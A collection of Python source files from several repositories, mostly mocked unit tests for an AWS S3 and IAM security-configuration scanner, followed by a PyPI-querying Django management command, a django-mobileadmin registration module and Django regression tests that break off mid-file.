"deny-incomplete-mixed": responses.GET_BUCKET_POLICY_DENY_PUT_DELETE_MIXED_STATEMENTS,
"allow-mixed": responses.GET_BUCKET_POLICY_ALLOW_GET_PUT_DELETE_MIXED_STATEMENTS,
"deny-other": responses.GET_BUCKET_POLICY_DENY_OTHER,
}
return policy_mapping[bucket_config]
def s3_client_bucket_content() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_policy=Mock(side_effect=get_bucket_policy)))
def test_get_bucket_content_deny_single() -> None:
content_deny = bucket_content_deny(enabled=True)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-single")
def test_get_bucket_content_deny_separate() -> None:
content_deny = bucket_content_deny(enabled=True)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-separate")
def test_get_bucket_content_deny_mixed() -> None:
content_deny = bucket_content_deny(enabled=True)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-mixed")
def test_get_bucket_content_deny_incomplete() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-incomplete")
def test_get_bucket_content_deny_incomplete_separate() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-incomplete-separate")
def test_get_bucket_content_deny_incomplete_mixed() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-incomplete-mixed")
def test_get_bucket_content_deny_allow_mixed() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("allow-mixed")
def test_get_bucket_content_deny_other() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-other")
def test_get_bucket_content_deny_failure(caplog: Any) -> None:
content_deny = bucket_content_deny(enabled=False)
with caplog.at_level(logging.WARNING):
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("access-denied")
assert "AccessDenied" in caplog.text
def get_bucket_cors(**kwargs: Dict[str, Any]) -> Any:
cors: Dict[Any, Any] = {
"cors-enabled": lambda: responses.GET_BUCKET_CORS_ENABLED,
"cors-disabled": lambda: _raise(
client_error("GetBucketCors", "NoSuchCORSConfiguration", "The CORS configuration does not exist")
),
"access-denied": lambda: _raise(client_error("GetBucketCors", "AccessDenied", "Access Denied")),
}
return cors[kwargs["Bucket"]]()
def s3_client_cors() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_cors=Mock(side_effect=get_bucket_cors)))
def test_get_bucket_cors_enabled() -> None:
cors = bucket_cors(enabled=True)
assert cors == s3_client_cors().get_bucket_cors("cors-enabled")
def test_get_bucket_cors_disabled() -> None:
cors = bucket_cors(enabled=False)
assert cors == s3_client_cors().get_bucket_cors("cors-disabled")
def test_get_bucket_cors_failure(caplog: Any) -> None:
cors = bucket_cors(enabled=True)
with caplog.at_level(logging.WARNING):
assert cors == s3_client_cors().get_bucket_cors("access-denied")
assert "AccessDenied" in caplog.text
def get_bucket_expiry_tagging(**kwargs: Dict[str, str]) -> Any:
expiry_config = str(kwargs["Bucket"])
if expiry_config == "no-tag":
raise client_error("GetBucketTagging", "NoSuchTagSet", "The TagSet does not exist")
expiry: Dict[Any, Any] = {
"expiry-1-week": responses.GET_BUCKET_TAGGING_EXPIRY_1_WEEK,
"expiry-1-month": responses.GET_BUCKET_TAGGING_EXPIRY_1_MONTH,
"expiry-90-days": responses.GET_BUCKET_TAGGING_EXPIRY_90_DAYS,
"expiry-6-months": responses.GET_BUCKET_TAGGING_EXPIRY_6_MONTHS,
"expiry-1-year": responses.GET_BUCKET_TAGGING_EXPIRY_1_YEAR,
"expiry-7-years": responses.GET_BUCKET_TAGGING_EXPIRY_7_YEARS,
"expiry-10-years": responses.GET_BUCKET_TAGGING_EXPIRY_10_YEARS,
"expiry-unknown": responses.GET_BUCKET_TAGGING_EXPIRY_UNKNOWN,
"no-expiry": responses.GET_BUCKET_TAGGING_NO_EXPIRY,
}
return expiry[expiry_config]
def s3_client_expiry_tagging() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_tagging=Mock(side_effect=get_bucket_expiry_tagging)))
def test_get_bucket_data_tagging_expiry_1_week() -> None:
tagging = bucket_data_tagging(expiry="1-week")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-1-week")
def test_get_bucket_data_tagging_expiry_1_month() -> None:
tagging = bucket_data_tagging(expiry="1-month")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-1-month")
def test_get_bucket_data_tagging_expiry_90_days() -> None:
tagging = bucket_data_tagging(expiry="90-days")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-90-days")
def test_get_bucket_data_tagging_expiry_6_months() -> None:
tagging = bucket_data_tagging(expiry="6-months")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-6-months")
def test_get_bucket_data_tagging_expiry_1_year() -> None:
tagging = bucket_data_tagging(expiry="1-year")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-1-year")
def test_get_bucket_data_tagging_expiry_7_years() -> None:
tagging = bucket_data_tagging(expiry="7-years")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-7-years")
def test_get_bucket_data_tagging_expiry_10_years() -> None:
tagging = bucket_data_tagging(expiry="10-years")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-10-years")
def test_get_bucket_data_tagging_expiry_unknown() -> None:
tagging = bucket_data_tagging(expiry="unset")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-unknown")
def test_get_bucket_data_tagging_no_expiry() -> None:
tagging = bucket_data_tagging(expiry="unset")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("no-expiry")
def test_get_bucket_data_tagging_expiry_failure(caplog: Any) -> None:
tagging = bucket_data_tagging(expiry="unset")
with caplog.at_level(logging.WARNING):
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("no-tag")
assert "NoSuchTagSet" in caplog.text
def get_bucket_sensitivity_tagging(**kwargs: Dict[str, Any]) -> Any:
bucket_tag_config: str = str(kwargs["Bucket"])
if bucket_tag_config == "no-tag":
raise client_error("GetBucketTagging", "NoSuchTagSet", "The TagSet does not exist")
tags: Dict[str, Any] = {
"low-sensitivity": responses.GET_BUCKET_TAGGING_LOW_SENSITIVITY,
"high-sensitivity": responses.GET_BUCKET_TAGGING_HIGH_SENSITIVITY,
"unknown-sensitivity": responses.GET_BUCKET_TAGGING_UNKNOWN_SENSITIVITY,
"no-sensitivity": responses.GET_BUCKET_TAGGING_NO_SENSITIVITY,
}
return tags[bucket_tag_config]
def s3_client_sensitivity_tagging() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_tagging=Mock(side_effect=get_bucket_sensitivity_tagging)))
def test_get_bucket_data_sensitivity_tagging_low() -> None:
tagging = bucket_data_tagging(sensitivity="low")
assert tagging == s3_client_sensitivity_tagging().get_bucket_data_tagging("low-sensitivity")
def test_get_bucket_data_sensitivity_tagging_high() -> None:
tagging = bucket_data_tagging(sensitivity="high")
assert tagging == s3_client_sensitivity_tagging().get_bucket_data_tagging("high-sensitivity")
def test_get_bucket_data_sensitivity_tagging_unknown() -> None:
tagging = bucket_data_tagging(sensitivity="unset")
    assert tagging == s3_client_sensitivity_tagging().get_bucket_data_tagging("unknown-sensitivity")
def test_get_bucket_data_sensitivity_no_sensitivity() -> None:
tagging = bucket_data_tagging(sensitivity="unset")
assert tagging == s3_client_sensitivity_tagging().get_bucket_data_tagging("no-sensitivity")
def test_get_bucket_data_sensitivity_tagging_failure(caplog: Any) -> None:
tagging = bucket_data_tagging(sensitivity="unset")
with caplog.at_level(logging.WARNING):
assert tagging == s3_client_sensitivity_tagging().get_bucket_data_tagging("no-tag")
assert "NoSuchTagSet" in caplog.text
def get_bucket_encryption(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "bad-bucket":
raise client_error(
"GetBucketEncryption",
"ServerSideEncryptionConfigurationNotFoundError",
"The server side encryption configuration was not found",
)
encryption_mapping: Dict[str, Any] = {
"cmk-bucket": responses.GET_BUCKET_ENCRYPTION_CMK,
"managed-bucket": responses.GET_BUCKET_ENCRYPTION_AWS_MANAGED,
"aes-bucket": responses.GET_BUCKET_ENCRYPTION_AES,
"keyless-bucket": responses.GET_BUCKET_ENCRYPTION_KEYLESS,
}
return encryption_mapping[buck]
def s3_client_encryption() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_encryption=Mock(side_effect=get_bucket_encryption)))
def test_get_bucket_encryption_cmk() -> None:
encryption = bucket_encryption(enabled=True, type="cmk")
assert encryption == s3_client_encryption().get_bucket_encryption("cmk-bucket")
def test_get_bucket_encryption_aws_managed() -> None:
encryption = bucket_encryption(enabled=True, type="aws")
assert encryption == s3_client_encryption().get_bucket_encryption("managed-bucket")
def test_get_bucket_encryption_aes() -> None:
encryption = bucket_encryption(enabled=True, type="aes")
assert encryption == s3_client_encryption().get_bucket_encryption("aes-bucket")
def test_get_bucket_encryption_keyless() -> None:
encryption = bucket_encryption(enabled=True, type="aws")
assert encryption == s3_client_encryption().get_bucket_encryption("keyless-bucket")
def test_get_bucket_encryption_not_encrypted(caplog: Any) -> None:
with caplog.at_level(logging.WARNING):
assert bucket_encryption(enabled=False) == s3_client_encryption().get_bucket_encryption("bad-bucket")
assert "ServerSideEncryptionConfigurationNotFoundError" in caplog.text
def get_bucket_logging(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "denied-bucket":
raise client_error("GetBucketLogging", "AccessDenied", "Access Denied")
logging_mapping = {
"logging-enabled-bucket": responses.GET_BUCKET_LOGGING_ENABLED,
"logging-disabled-bucket": responses.GET_BUCKET_LOGGING_DISABLED,
}
return logging_mapping[buck]
def s3_client_logging() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_logging=Mock(side_effect=get_bucket_logging)))
def test_get_bucket_logging_enabled() -> None:
assert bucket_logging(enabled=True) == s3_client_logging().get_bucket_logging("logging-enabled-bucket")
def test_get_bucket_logging_disabled() -> None:
assert bucket_logging(enabled=False) == s3_client_logging().get_bucket_logging("logging-disabled-bucket")
def test_get_bucket_logging_failure(caplog: Any) -> None:
with caplog.at_level(logging.WARNING):
assert bucket_logging(enabled=False) == s3_client_logging().get_bucket_logging("denied-bucket")
assert "AccessDenied" in caplog.text
def get_bucket_lifecycle(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "no-lifecycle":
raise client_error(
"GetBucketLifecycleConfiguration",
"NoSuchLifecycleConfiguration",
"The lifecycle configuration does not exist",
)
lifecycle_mapping: Dict[str, Any] = {
"single-rule": responses.GET_BUCKET_LIFECYCLE_CONFIGURATION_SINGLE_RULE,
"multiple-rules": responses.GET_BUCKET_LIFECYCLE_CONFIGURATION_MULTIPLE_RULES,
"disabled": responses.GET_BUCKET_LIFECYCLE_CONFIGURATION_DISABLED,
"no-expiry": responses.GET_BUCKET_LIFECYCLE_CONFIGURATION_NO_EXPIRY,
}
return lifecycle_mapping[buck]
def s3_client_lifecycle() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_lifecycle_configuration=Mock(side_effect=get_bucket_lifecycle)))
def test_get_bucket_lifecycle_single_rule() -> None:
lifecycle = bucket_lifecycle(current_version_expiry=15, previous_version_deletion=30)
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("single-rule")
def test_get_bucket_lifecycle_multiple_rules() -> None:
lifecycle = bucket_lifecycle(current_version_expiry=5, previous_version_deletion=10)
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("multiple-rules")
def test_get_bucket_lifecycle_disabled() -> None:
lifecycle = bucket_lifecycle(current_version_expiry="unset", previous_version_deletion="unset")
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("disabled")
def test_get_bucket_lifecycle_no_expiry() -> None:
lifecycle = bucket_lifecycle(current_version_expiry="unset", previous_version_deletion="unset")
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("no-expiry")
def test_get_bucket_lifecycle_not_set(caplog: Any) -> None:
lifecycle = bucket_lifecycle(current_version_expiry="unset", previous_version_deletion="unset")
with caplog.at_level(logging.WARNING):
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("no-lifecycle")
assert "NoSuchLifecycleConfiguration" in caplog.text
def get_bucket_mfa(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "access-denied":
raise client_error("GetBucketVersioning", "AccessDenied", "Access Denied")
versioning_mapping: Dict[str, Any] = {
"mfa-delete-enabled": responses.GET_BUCKET_VERSIONING_MFA_DELETE_ENABLED,
"mfa-delete-disabled": responses.GET_BUCKET_VERSIONING_MFA_DELETE_DISABLED,
"mfa-delete-unset": responses.GET_BUCKET_VERSIONING_MFA_DELETE_UNSET,
}
return versioning_mapping[buck]
def s3_client_mfa() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_versioning=Mock(side_effect=get_bucket_mfa)))
def test_get_bucket_mfa_delete_enabled() -> None:
mfa_delete = bucket_mfa_delete(enabled=True)
assert mfa_delete == s3_client_mfa().get_bucket_mfa_delete("mfa-delete-enabled")
def test_get_bucket_mfa_delete_disabled() -> None:
mfa_delete = bucket_mfa_delete(enabled=False)
assert mfa_delete == s3_client_mfa().get_bucket_mfa_delete("mfa-delete-disabled")
def test_get_bucket_mfa_delete_unset() -> None:
mfa_delete = bucket_mfa_delete(enabled=False)
assert mfa_delete == s3_client_mfa().get_bucket_mfa_delete("mfa-delete-unset")
def test_get_bucket_mfa_delete_failure(caplog: Any) -> None:
mfa_delete = bucket_mfa_delete(enabled=False)
with caplog.at_level(logging.WARNING):
assert mfa_delete == s3_client_mfa().get_bucket_mfa_delete("access-denied")
assert "AccessDenied" in caplog.text
def s3_client_pab(public_access_block_response: Dict[str, Any]) -> AwsS3Client:
return AwsS3Client(
Mock(
get_public_access_block=Mock(
side_effect=lambda **kwargs: public_access_block_response
if kwargs.get("Bucket") == "bucket"
else _raise(client_error("GetPublicAccessBlock", "AccessDenied", "Access Denied")),
)
)
)
def test_get_bucket_public_access_block() -> None:
blocked = bucket_public_access_block(enabled=True)
not_blocked = bucket_public_access_block(enabled=False)
scenarios: Sequence[Dict[str, Any]] = [
{"response": responses.public_access_block(False, False, False, False), "state": not_blocked},
{"response": responses.public_access_block(False, False, False, True), "state": not_blocked},
{"response": responses.public_access_block(False, False, True, False), "state": not_blocked},
{"response": responses.public_access_block(False, True, False, False), "state": not_blocked},
{"response": responses.public_access_block(True, False, False, False), "state": not_blocked},
{"response": responses.public_access_block(False, False, True, True), "state": not_blocked},
{"response": responses.public_access_block(True, True, False, False), "state": not_blocked},
{"response": responses.public_access_block(False, True, False, True), "state": blocked},
{"response": responses.public_access_block(True, False, True, False), "state": not_blocked},
{"response": responses.public_access_block(True, False, False, True), "state": not_blocked},
{"response": responses.public_access_block(False, True, True, False), "state": not_blocked},
{"response": responses.public_access_block(False, True, True, True), "state": blocked},
{"response": responses.public_access_block(True, True, True, False), "state": not_blocked},
{"response": responses.public_access_block(True, True, False, True), "state": blocked},
{"response": responses.public_access_block(True, False, True, True), "state": not_blocked},
{"response": responses.public_access_block(True, True, True, True), "state": blocked},
]
for scenario in scenarios:
assert scenario["state"] == s3_client_pab(scenario["response"]).get_bucket_public_access_block("bucket")
def test_get_bucket_public_access_block_failure(caplog: Any) -> None:
not_blocked = bucket_public_access_block(enabled=False)
with caplog.at_level(logging.WARNING):
assert not_blocked == s3_client_pab({}).get_bucket_public_access_block("denied")
assert "AccessDenied" in caplog.text
def get_bucket_secure_transport(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "denied":
raise client_error("GetBucketPolicy", "AccessDenied", "Access Denied")
policy_mapping: Dict[str, Any] = {
"bucket": responses.GET_BUCKET_POLICY,
"secure-bucket": responses.GET_BUCKET_POLICY_SECURE_TRANSPORT,
}
return policy_mapping[buck]
def s3_client_secure_transport() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_policy=Mock(side_effect=get_bucket_secure_transport)))
def test_get_bucket_secure_transport_disabled() -> None:
secure_transport = bucket_secure_transport(enabled=False)
assert secure_transport == s3_client_secure_transport().get_bucket_secure_transport("bucket")
def test_get_bucket_secure_transport_enabled() -> None:
secure_transport = bucket_secure_transport(enabled=True)
assert secure_transport == s3_client_secure_transport().get_bucket_secure_transport("secure-bucket")
def test_get_bucket_secure_transport_failure(caplog: Any) -> None:
secure_transport = bucket_secure_transport(enabled=False)
with caplog.at_level(logging.WARNING):
assert secure_transport == s3_client_secure_transport().get_bucket_secure_transport("denied")
assert "AccessDenied" in caplog.text
def get_bucket_versioning(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "access-denied":
raise client_error("GetBucketVersioning", "AccessDenied", "Access Denied")
versioning_mapping: Dict[str, Any] = {
"versioning-enabled": responses.GET_BUCKET_VERSIONING_ENABLED,
"versioning-suspended": responses.GET_BUCKET_VERSIONING_SUSPENDED,
"versioning-unset": responses.GET_BUCKET_VERSIONING_UNSET,
}
return versioning_mapping[buck]
def s3_client_versioning() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_versioning=Mock(side_effect=get_bucket_versioning)))
def test_get_bucket_versioning_enabled() -> None:
versioning = bucket_versioning(enabled=True)
assert versioning == s3_client_versioning().get_bucket_versioning("versioning-enabled")
def test_get_bucket_versioning_suspended() -> None:
versioning = bucket_versioning(enabled=False)
assert versioning == s3_client_versioning().get_bucket_versioning("versioning-suspended")
def test_get_bucket_versioning_unset() -> None:
versioning = bucket_versioning(enabled=False)
assert versioning == s3_client_versioning().get_bucket_versioning("versioning-unset")
def test_get_bucket_versioning_failure(caplog: Any) -> None:
versioning = bucket_versioning(enabled=False)
with caplog.at_level(logging.WARNING):
assert versioning == s3_client_versioning().get_bucket_versioning("access-denied")
assert "AccessDenied" in caplog.text
def put_object(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
key = str(kwargs["Key"])
body = str(kwargs["Body"])
return (
responses.PUT_OBJECT
if buck == "buck" and key == "obj" and body == "bla"
else _raise(client_error("PutObject", "AccessDenied", "Access Denied"))
)
def s3_client_put_object() -> AwsS3Client:
return AwsS3Client(Mock(put_object=Mock(side_effect=put_object)))
def test_put_object_success() -> None:
assert "some id" == s3_client_put_object().put_object(bucket="buck", object_name="obj", object_content="bla")
def test_put_object_failure(caplog: Any) -> None:
with caplog.at_level(logging.WARNING):
s3_client_put_object().put_object(bucket="denied", object_name="obj", object_content="bla")
assert "AccessDenied" in caplog.text
def test_get_bucket_policy() -> None:
expected_policy = {"Statement": [{"Effect": "Allow", "Principal": "*", "Action": "s3:getObject", "Resource": "*"}]}
s3_client = AwsS3Client(
Mock(
get_bucket_policy=Mock(
side_effect=lambda **kwargs: responses.GET_BUCKET_POLICY if kwargs["Bucket"] == "some-bucket" else None
)
)
)
actual_policy = s3_client.get_bucket_policy("some-bucket")
assert actual_policy == expected_policy
def test_get_bucket_policy_bucket_does_not_exist(caplog: Any) -> None:
s3_client = AwsS3Client(
Mock(get_bucket_policy=Mock(side_effect=client_error("GetBucketPolicy", "NoSuchBucket", "no")))
)
with caplog.at_level(logging.WARNING):
assert s3_client.get_bucket_policy("boom") is None
assert "NoSuchBucket" in caplog.text
assert "boom" in caplog.text
```
#### File: tests/data/test_aws_iam_types.py
```python
from pytest import raises
from src.data.aws_scanner_exceptions import UnsupportedPolicyDocumentElement
from tests.test_types_generator import policy
def test_policy_doc_equals() -> None:
single_statement = {
"Statement": {"Effect": "Allow", "Action": ["a:2", "a:1", "b:2", "b:3", "b:1"], "Resource": ["1", "2"]}
}
multi_statements = {
"Statement": [
{"Effect": "Allow", "Action": ["b:1", "b:2", "a:2"], "Resource": "1"},
{"Effect": "Allow", "Action": ["b:1", "b:2"], "Resource": "2"},
{"Effect": "Allow", "Action": "a:2", "Resource": "2"},
{"Effect": "Allow", "Action": ["a:1", "b:3"], "Resource": ["2", "1"]},
],
}
assert policy(document=single_statement).doc_equals(multi_statements)
def test_policy_doc_equals_with_condition() -> None:
single_statement = {
"Statement": {"Effect": "Deny", "Action": "e:7", "Resource": ["abc", "def"], "Condition": {"a": {"b": "c"}}},
}
multi_statements = {
"Statement": [
{"Effect": "Deny", "Action": "e:7", "Resource": "def", "Condition": {"a": {"b": "c"}}},
{"Effect": "Deny", "Action": "e:7", "Resource": "abc", "Condition": {"a": {"b": "c"}}},
],
}
assert policy(document=single_statement).doc_equals(multi_statements)
def test_policy_doc_not_equals_when_effect_mismatch() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1"}}
doc_b = {"Statement": {"Effect": "Deny", "Action": "a:1", "Resource": "1"}}
assert not policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_not_equals_when_action_mismatch() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1"}}
doc_b = {"Statement": {"Effect": "Allow", "Action": "b:1", "Resource": "1"}}
assert not policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_not_equals_when_resource_mismatch() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1"}}
doc_b = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "2"}}
assert not policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_not_equals_when_condition_mismatch() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1", "Condition": {"banana": 9}}}
doc_b = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1"}}
assert not policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_equals_ignores_sid() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1", "Sid": "blue"}}
doc_b = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1", "Sid": "gray"}}
assert policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_equals_not_action_unsupported() -> None:
doc = {"Statement": {"Effect": "Allow", "NotAction": "a:1", "Resource": "1"}}
with raises(UnsupportedPolicyDocumentElement, match="NotAction"):
policy().doc_equals(doc)
def test_policy_doc_equals_not_resource_unsupported() -> None:
doc = {"Statement": {"Effect": "Allow", "Action": "a:1", "NotResource": "1"}}
with raises(UnsupportedPolicyDocumentElement, match="NotResource"):
policy().doc_equals(doc)
def test_policy_doc_equals_principal_unsupported() -> None:
doc = {"Statement": {"Effect": "Allow", "Action": "a:1", "Principal": "1"}}
with raises(UnsupportedPolicyDocumentElement, match="Principal"):
policy().doc_equals(doc)
def test_policy_doc_equals_not_principal_unsupported() -> None:
doc = {"Statement": {"Effect": "Allow", "Action": "a:1", "NotPrincipal": "1"}}
with raises(UnsupportedPolicyDocumentElement, match="NotPrincipal"):
policy().doc_equals(doc)
```
#### File: tests/tasks/test_aws_athena_task.py
```python
from unittest import TestCase
from unittest.mock import Mock
from tests.test_types_generator import athena_task
class TestAwsAthenaTask(TestCase):
def test_run_task(self) -> None:
with self.assertRaises(NotImplementedError):
athena_task()._run_task(Mock())
```
#### File: tests/tasks/test_aws_audit_iam_task.py
```python
import dataclasses
import datetime
from unittest.mock import Mock, call
from tests.test_types_generator import account
from src.tasks.aws_audit_iam_task import AwsAuditIamTask
from src.data.aws_iam_types import AccessKey, User
def test_run_task() -> None:
user1 = User(user_name="user1")
user2 = User(user_name="user2")
users = [user1, user2]
user1_key1 = AccessKey(id="keyid1", user_name=user1.user_name, created=datetime.datetime(2021, 11, 1, 17, 10, 0))
user2_key1 = AccessKey(id="u2key1", user_name=user2.user_name, created=datetime.datetime(2020, 10, 15, 1, 23, 27))
user2_key2 = AccessKey(id="u2key2", user_name=user2.user_name, created=datetime.datetime(2021, 4, 29, 9, 55, 43))
last_used = [datetime.datetime(2021, 11, 2, 8, 45, 12), None, datetime.datetime(2021, 5, 5, 14, 34, 23)]
iam_client = Mock(
list_users=Mock(return_value=users),
list_access_keys=Mock(side_effect=[[user1_key1], [user2_key1, user2_key2]]),
get_access_key_last_used=Mock(side_effect=last_used),
)
expected_report = {
"iam_access_keys": [
dataclasses.replace(user1_key1, last_used=last_used[0]),
dataclasses.replace(user2_key1),
dataclasses.replace(user2_key2, last_used=last_used[2]),
]
}
assert expected_report == AwsAuditIamTask(account())._run_task(iam_client)
assert iam_client.list_access_keys.call_args_list == [call(user1), call(user2)]
assert iam_client.get_access_key_last_used.call_args_list == [call(user1_key1), call(user2_key1), call(user2_key2)]
```
#### File: platsec-aws-scanner/tests/test_json_serializer.py
```python
import datetime
from unittest import TestCase
from dataclasses import dataclass
from typing import Callable, Optional
from src.json_serializer import to_json
class TestJsonSerializer(TestCase):
def test_serialize_exclude_callable_and_none_properties(self) -> None:
self.assertEqual('{"greetings": "Bonjour!"}', to_json(TestJsonSerializer.TestObject()))
@dataclass
class TestObject:
_secret: str = "I'm private, don't serialise me"
greetings: str = "Bonjour!"
empty: Optional[str] = None
func: Callable[[], str] = lambda: "hello"
def test_serialize_datetime(self) -> None:
self.assertEqual(
'{"name": "Andy", "born": "2021-11-01T15:30:10"}', to_json(TestJsonSerializer.TestDatetimeObject())
)
@dataclass
class TestDatetimeObject:
name: str = "Andy"
born: datetime.datetime = datetime.datetime(2021, 11, 1, 15, 30, 10)
```
|
{
"source": "jezdez-archive/djangoapps",
"score": 2
}
|
#### File: management/commands/updateapps.py
```python
import xmlrpclib
from django.conf import settings
from django.core.management.base import NoArgsCommand
PYPI_URL = "http://cheeseshop.python.org/pypi"
PYPI_KEYWORD = "django"
PYPI_METADATA = (
"name",
"description",
"long_description",
"homepage",
"license",
)
from djangoapps.models import DjangoApp
class Command(NoArgsCommand):
    help = 'Queries PyPI for Django packages and updates the app database.'
def handle_noargs(self, **options):
"""
        Queries PyPI for packages matching the default keyword and updates the
        app database accordingly.
"""
specs = {'keywords': PYPI_KEYWORD}
pypi = xmlrpclib.Server(PYPI_URL)
query = pypi.search(specs)
results = sorted(query, key=lambda s: s['name'].lower())
for package in results:
name = package['name']
            # Pick a release to inspect; skip packages that have no releases
            try:
                version = pypi.package_releases(name)[-1]
            except IndexError:
                print "Skipping %r: no versions" % name
                continue
            # Load release information
            info = pypi.release_data(name, version)
print "Updating: %r (%s)" % (name, version)
# Load app or create if not existing
# try:
# app = DjangoApp.objects.get(name=name)
# except DjangoApp.DoesNotExist:
# app = DjangoApp(name=name)
# print "Created app %r" % name
print info.keys()
# TODO
# Fill app with data from PyPI
# the model fields should have the same variable name
for data in PYPI_METADATA:
value = info.get(data, '')
if value is None or value.strip().lower() == "unknown":
value = ""
#setattr(app, data, value.strip())
#app.save()
```
|
{
"source": "jezdez-archive/django-mobileadmin",
"score": 2
}
|
#### File: django-mobileadmin/mobileadmin/__init__.py
```python
from django.contrib.admin import site as main_site
from django.core.exceptions import ImproperlyConfigured
from mobileadmin import decorators, views
from mobileadmin.conf import settings
### From http://www2.lib.uchicago.edu/keith/courses/python/class/5/#attrref
def classlookup(C, name):
if C.__dict__.has_key(name):
return (1, C.__dict__[name])
else:
for b in C.__bases__:
success, value = classlookup(b, name)
if success:
return (1, value)
else:
pass
else:
return (0, None)
def autoregister():
"""
Auto-register all ModelAdmin instances of the default AdminSite with the
mobileadmin app and set the templates accordingly.
"""
from django.contrib.auth.admin import UserAdmin
from mobileadmin.sites import site
for model, modeladmin in main_site._registry.iteritems():
admin_class = modeladmin.__class__
for name in settings.TEMPLATE_MAPPING:
(found, value) = classlookup(admin_class, name)
if found:
setattr(admin_class, name, decorators.mobile_templates(value))
if admin_class == UserAdmin:
setattr(admin_class, 'add_view', views.auth_add_view)
site.register(model, admin_class)
def autodiscover():
raise ImproperlyConfigured("Please use the autodiscover function of "
"Django's default admin app and then "
"call 'mobileadmin.autoregister' to use "
"mobileadmin.")
```
|
{
"source": "jezdez-archive/django-old",
"score": 2
}
|
#### File: modeltests/force_insert_update/tests.py
```python
from __future__ import absolute_import
from django.db import transaction, IntegrityError, DatabaseError
from django.test import TestCase
from .models import Counter, WithCustomPK
class ForceTests(TestCase):
def test_force_update(self):
c = Counter.objects.create(name="one", value=1)
# The normal case
c.value = 2
c.save()
# Same thing, via an update
c.value = 3
c.save(force_update=True)
# Won't work because force_update and force_insert are mutually
# exclusive
c.value = 4
self.assertRaises(ValueError, c.save, force_insert=True, force_update=True)
# Try to update something that doesn't have a primary key in the first
# place.
c1 = Counter(name="two", value=2)
self.assertRaises(ValueError, c1.save, force_update=True)
c1.save(force_insert=True)
# Won't work because we can't insert a pk of the same value.
sid = transaction.savepoint()
c.value = 5
self.assertRaises(IntegrityError, c.save, force_insert=True)
transaction.savepoint_rollback(sid)
# Trying to update should still fail, even with manual primary keys, if
# the data isn't in the database already.
obj = WithCustomPK(name=1, value=1)
self.assertRaises(DatabaseError, obj.save, force_update=True)
```
#### File: regressiontests/admin_inlines/tests.py
```python
from __future__ import absolute_import
from django.contrib.admin.helpers import InlineAdminForm
from django.contrib.auth.models import User, Permission
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase
# local test models
from .admin import InnerInline
from .models import (Holder, Inner, Holder2, Inner2, Holder3, Inner3, Person,
OutfitItem, Fashionista, Teacher, Parent, Child, Author, Book)
class TestInline(TestCase):
urls = "regressiontests.admin_inlines.urls"
fixtures = ['admin-views-users.xml']
def setUp(self):
holder = Holder(dummy=13)
holder.save()
Inner(dummy=42, holder=holder).save()
self.change_url = '/admin/admin_inlines/holder/%i/' % holder.id
result = self.client.login(username='super', password='<PASSWORD>')
self.assertEqual(result, True)
def tearDown(self):
self.client.logout()
def test_can_delete(self):
"""
can_delete should be passed to inlineformset factory.
"""
